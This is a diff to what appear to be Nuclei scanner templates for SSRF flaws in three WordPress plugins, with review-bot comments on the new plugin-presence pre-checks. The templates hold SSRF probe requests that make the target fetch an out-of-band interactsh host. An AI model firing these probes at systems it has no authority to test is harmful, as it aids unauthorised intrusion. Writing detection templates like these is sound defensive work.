diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml
index 989df6769d..fe452435e7 100644
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@@ -30,7 +30,22 @@ info:
 framework: wordpress
 tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto
 
+flow: http(1) && http(2)
+
 http:
+ - raw:
+ - |
+ GET /wp-content/plugins/canto/readme.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - 'Canto'
+ - 'Tested up to:'
+ condition: and
+
 - method: GET
 path:
 - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml
index d6a1ed0594..33835011a6 100644
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@@ -30,7 +30,19 @@ info:
 fofa-query: body="formcraft3" && body="wp-"
 tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc
 
+flow: http(1) && http(2)
+
 http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - '/wp-content/plugins/formcraft3/'
+
 - method: GET
 path:
 - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
index ca5e2ae432..764d019c4e 100644
--- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
+++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
@@ -14,7 +14,20 @@ info:
 max-request: 1
 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm
 
+flow: http(1) && http(2)
+
 http:
+ - raw:
+ - |
+ GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - '= Under Construction'
+
 - raw:
 - |
 POST /wp-admin/admin-ajax.php HTTP/2
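Review bot: Gating on `readme.txt` in the new first request turns a blocked or deleted readme into a silent skip. With `flow: http(1) && http(2)`, the `detail.php` probe never runs on a host that denies access to plugin readme files, even if the plugin is installed. The same gate is added in wp-under-construction-ssrf.yaml. If the trade-off is intended, record it above the `flow:` line, e.g. `# pre-check: the OAST probe is skipped when the plugin readme is not readable, so hosts that block readme.txt are not assessed`. The word match on `'Canto'` is also case-sensitive and has no status check; `case-insensitive: true` on that matcher would make the gate less brittle.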
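Review bot: The pre-check in CVE-2022-0591.yaml looks for `'/wp-content/plugins/formcraft3/'` only in the body of `{{BaseURL}}`, so the `admin-ajax.php` probe is skipped whenever the landing page does not reference the plugin's assets. That presumably happens on sites that embed the form on an inner page only, which would make this gate a source of false negatives. The first request also does not follow redirects, so a host that redirects `/` elsewhere returns no matching body. Adding `host-redirects: true` and `max-redirects: 2` to the first request would cover the redirect case. A comment above `flow:` should state that detection depends on the landing page exposing the plugin path.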
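Review bot: `max-request: 1` in the info block of wp-under-construction-ssrf.yaml is stale, because the added flow sends the readme request and then the POST; it should read `max-request: 2`. The internal matcher also accepts any response whose body contains `'= Under Construction'`, whatever the status code. Pairing it with a `status` matcher for 200 under `matchers-condition: and` would stop a custom error page from satisfying the gate. The second request's block continues past the end of the hunk.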